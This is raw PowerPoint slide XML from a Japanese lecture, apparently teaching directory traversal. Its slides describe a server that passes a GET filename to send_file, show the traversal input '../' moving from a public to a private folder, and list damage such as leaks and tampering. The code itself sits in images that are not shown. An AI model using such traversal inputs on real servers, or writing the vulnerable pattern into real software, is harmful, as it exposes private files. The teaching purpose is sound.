            <a:ext cx="2261883" cy="685458"/>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EDDE6A0D-F2C4-FF4C-0AF4-75B86976FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5327374" y="4656230"/>
            <a:ext cx="2261883" cy="404868"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 6019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3903CAD4-3274-144F-DF0E-4E8B75DC23AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7587294" y="3958423"/>
            <a:ext cx="1705213" cy="504895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="直線矢印コネクタ 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED56D8C0-C1C0-93BF-D672-8E27B8B69E49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="12" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5327374" y="4210871"/>
            <a:ext cx="22599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194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0F2EA-3582-B620-7D4F-3E2F84E6BCFD}"/>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3F84BD2E-DAF9-D4AA-FFA1-669A453BB136}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ディレクトリトラバーサルの仕組み</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>準備：ファイル</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>static/p</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ublic/public.txt(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>公開ファイル</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>static/private/private.txt(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>秘密ファイル</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2480AF7-4F74-8024-3588-A7CB61C1DF73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4373816" y="2773410"/>
            <a:ext cx="3444368" cy="1064003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="図 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0E9453C-8091-C507-5A8D-7DBB8C6A26CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4373816" y="4888428"/>
            <a:ext cx="3444368" cy="990081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32364474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A31D6-7284-1902-F793-702687556A57}"/>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34E70C60-0360-3E64-59F2-0CBBAD38EF00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ディレクトリトラバーサルの仕組み</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>準備：ファイル</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>static/other</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>/other.txt(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>その他のファイル</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3597D6A4-38EB-EEAE-B9BF-EDE18E47D584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776339" y="2871862"/>
            <a:ext cx="4639322" cy="1305107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2733363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D51E25-8BD4-9C83-2234-0F67E674519F}"/>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64C5FB1B-9536-B192-392C-8ACEF288E719}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ディレクトリトラバーサル</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(Python(1/2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>：正常アクセス</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ディレクトリにファイル名を連結することでファイルを開ける。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="図 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3063EB85-CDEA-961D-B56F-F1228359812B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="48232"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7483591" y="2785590"/>
            <a:ext cx="3870208" cy="1552655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="図 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CA1331C-ABAE-E84F-EAD0-A502CBBA21F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="2785590"/>
            <a:ext cx="4926496" cy="2341565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24427368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D51E25-8BD4-9C83-2234-0F67E674519F}"/>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64C5FB1B-9536-B192-392C-8ACEF288E719}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ディレクトリトラバーサル</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(Python(2/2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>：不正アクセス</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>「</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」で「</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>../</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」を入れることで</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>から</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>private</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>にディレクトリを移動できる。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="図 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D073A2E7-4D49-E15E-2B0B-B11470DE5A87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6812456" y="3154714"/>
            <a:ext cx="4541344" cy="1674881"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="図 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C23E7CCE-384E-3DB7-032F-ABBC2477E86C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3154714"/>
            <a:ext cx="4990106" cy="2366849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="図 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB291598-CD61-CD6B-D85A-B6A43C5329FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6812456" y="5472960"/>
            <a:ext cx="4191585" cy="381053"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="図 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4A0885C-92B4-289D-27B3-7ECE35CCEEB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6812456" y="6414456"/>
            <a:ext cx="4067743" cy="314369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="テキスト ボックス 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF89F757-9626-0CAE-70A6-357B917B39D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6812455" y="5167338"/>
            <a:ext cx="2954655" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>実際のファイルパスを見る</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="テキスト ボックス 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9776F901-0BFC-EAAD-D244-5F7BBB277425}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6812455" y="6091506"/>
            <a:ext cx="4057521" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>実際のファイルパスの出力結果</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>一部</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29260649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BF0D99-A980-A815-A7A3-4C96C6D3AB93}"/>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2EB4FFDE-607B-69C3-518F-008A16DD32EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ディレクトリトラバーサルの被害例</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>重要情報の漏洩・改竄など</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>団体が保有している情報資産や個人情報などの漏洩や改竄など。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>設定・プログラム・データなどの漏洩・改竄</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>設定などに使われているファイルやプログラムファイル等を漏洩することで侵入の手掛かりにすることやファイルを改竄されて予期しない挙動のするように書き換えられるなど。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21285303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6E1062-34C0-B59D-44F9-78279BF8B75E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ディレクトリトラバーサル</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="コンテンツ プレースホルダー 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9AFBDE6-A661-52BA-D55C-9CC7F2878A40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>作成者の意図しないファイルアクセス</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サーバ側</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>send_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を用いてファイルをレスポンス</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>でファイル名を受け取ってファイルまでのパスに反映</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A093F33-F9D6-69B8-683E-30F7D1DC20D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3212962" y="3255688"/>
            <a:ext cx="5766075" cy="3237187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="376422731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8795</TotalTime>
  <Words>11713</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>ワイド画面</PresentationFormat>
  <Paragraphs>1003</Paragraphs>
  <Slides>145</Slides>
  <Notes>145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145</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
